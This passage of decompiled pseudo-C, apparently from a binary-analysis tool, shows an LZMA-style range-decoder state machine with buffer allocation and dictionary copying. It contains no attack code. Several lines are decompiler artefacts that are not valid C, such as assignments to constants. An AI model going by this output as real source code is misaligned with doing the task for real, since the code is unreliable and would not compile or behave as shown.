													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
